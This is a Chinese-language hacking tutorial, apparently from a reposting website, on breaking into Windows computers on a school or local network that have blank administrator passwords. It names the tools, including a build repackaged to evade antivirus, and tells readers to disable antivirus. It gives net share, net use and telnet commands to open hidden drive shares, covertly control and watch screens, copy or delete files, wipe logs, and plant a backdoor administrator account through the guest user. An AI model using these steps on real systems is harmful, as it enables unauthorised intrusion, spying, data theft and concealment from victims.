首先申明：

　　1.入侵的范圍只包括局域網(wǎng)，如果在學(xué)校上，可以入侵整個校園網(wǎng)；

　　2.能入侵的只是存在弱口令(用戶名為administrator等,密碼為空)，并且開了139端口，但沒開防火墻的機(jī)子。

　　入侵工具：

　　一般要用到三個：NTscan變態(tài)掃描器，Recton--D賀免殺專用版，DameWare迷你中文版 4.5. （前兩個工具殺毒軟件都會報毒，建議將殺毒軟件實時防毒暫時關(guān)掉，并將這兩個軟件的壓縮包加密，防止被殺。）

　　入侵步驟：

　　1.使用"NTscan變態(tài)掃描器"，在IP處填上要掃描的IP范圍，選擇"WMI掃描"方式，按"開始"后就等掃描結(jié)果了。

　　2.使用"Recton--D賀免殺專用版"

　　選擇"CMD命令"項，在"CMD:"中輸入"net share C$=C:\"，即可開啟遠(yuǎn)程主機(jī)的C盤共享，以此將"C"換成D,E,F等，即可開啟D盤，E盤，F(xiàn)盤等的共享，這種共享方式隱蔽性很高，而且是完全共享，在對方主機(jī)上不會出現(xiàn)一只手托住盤的共享標(biāo)志，然后在地址欄中輸入"\\對方IP\C$"，即可進(jìn)入對方C盤。

　　選擇"Telnet"項，在"遠(yuǎn)程主機(jī)"中輸入剛才掃描到的一個IP，遠(yuǎn)程啟動Telnet服務(wù)，成功后在"CMD選項"中，執(zhí)行命令："net share ipc$",接著執(zhí)行："net share admin$",最后執(zhí)行"net use \\***.***.***.***\IPC$ "" /user：administrator"在*處填入你入侵的主機(jī)IP。

　　3.使用"DameWare迷你中文版 4.5"，安裝后點"DameWare Mini Remote Control"，在"幫助"項中選擇激活產(chǎn)品，輸入注冊信息，成功注冊后，進(jìn)入"遠(yuǎn)程連接"窗口，在"主機(jī)"處填入IP地址，點"設(shè)置"，在"服務(wù)安裝選項"中點"編輯"后,在"通知對話框"中去掉"連接時通知",在"附加設(shè)置"中全都不選，在"用戶選項"中去掉"啟用用戶選項菜單"。設(shè)置完成好后，就可點"連接"，在彈出的對話框中點"確定"后，成功后你就可以像操作自己機(jī)子一樣控制別人電腦了，當(dāng)然你也可以只選擇監(jiān)視對方屏幕。 注意：如果不注冊的話，在對方主機(jī)上會彈出一個對話框，暴露你的身份。

　　入侵步驟補(bǔ)充：

　　1.在以上第2步中，遠(yuǎn)程啟動Telnet服務(wù)可以通過"我的電腦-管理-連接到另一臺計算機(jī)-輸入IP-服務(wù)和應(yīng)用程序-服務(wù)-將telnet改為手動-啟動"完成。

　　2.Recton--D賀免殺專用版還有其他功能，在"進(jìn)程"項中，可以查看遠(yuǎn)程主機(jī)的進(jìn)程，并可任意結(jié)束其中進(jìn)程；在"共享"項中，可以創(chuàng)建共享，我常用是創(chuàng)建C$,D$,E$,F$,共享路徑分別對應(yīng)C：\,D：\等，共享好后在地址欄中輸入"\\IP\C$",進(jìn)入對方C盤，你就可以隨意復(fù)制刪除里面的東西了，而且這種共享對方機(jī)子盤符上不會顯示共享圖標(biāo)，也就不會被發(fā)現(xiàn)，弄完后最好還是把共享給關(guān)掉。最后選"日志"，清除所有日志，不留痕跡。這個軟件會被殺毒軟件當(dāng)作病毒殺掉，用它時須將實時防毒關(guān)掉。

　　3.上面的共享可通過CMD(程序-附件-命令提示符)完成，首先"telnet IP",telnet上去,鍵入y后輸入的用戶名"administrator",密碼為空, 進(jìn)入后，開共享用net share命令，共享C$(即C盤)："net share C$=C：",共享system文件夾："net share c=c：\winnt\system32",共享IPC$用："net share IPC$"等,最后是關(guān)閉共享，關(guān)閉C盤共享："net share C$ /del"。

　　4.為方便下次入侵，可以設(shè)置后門， 查看用戶："net user",激活guest用戶

　　"net user guest /active：yes",更改guest的密碼為poco："net user guest poco",把guest的權(quán)限提升為管理員權(quán)限："net localgroup administrators guest /add"。

　　5.telnet命令(DOS命令)很多，可去網(wǎng)上查找它的命令，常用的有：查看D盤文件：""dir d：\",查看C盤program file文件夾："dir c：\PROGRA~1\;",60秒倒記時關(guān)機(jī)："shutdown -s -t 60"

　　補(bǔ)充說明：

　　1.net use錯誤原因解決：

　　(1)."發(fā)生系統(tǒng)錯誤 1326。 登錄失敗： 未知的用戶名或錯誤密碼。"

　　在遠(yuǎn)程機(jī)的"控制面板-文件夾選項-查看-簡單的文件共享",去掉選取,然后再嘗試連接。簡單文件共享會把網(wǎng)絡(luò)連接權(quán)限都?xì)w為 guest連接，是無法訪問C$等管理共享的.

　　(2)"發(fā)生系統(tǒng)錯誤 1327。 登陸失?。河脩魩粝拗??？赡艿脑虬ú辉试S空密碼，登陸時間限制，或強(qiáng)制的策略限。"在遠(yuǎn)程機(jī)的"控制面板－管理工具－本地安全策略－安全選項－用戶權(quán)限"指派里，禁用"空密碼用戶只能進(jìn)行控制臺登陸".

　　(3)"//IP/c$"時提示找不到網(wǎng)絡(luò)途徑。在"網(wǎng)絡(luò)和撥號連接"中"本地連接"中選取"Internet協(xié)議(TCP/IP)"屬性，進(jìn)入"高級TCP/IP設(shè)置"選"WINS設(shè)置"里面有一項"啟用TCP/IP的NETBIOS".

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。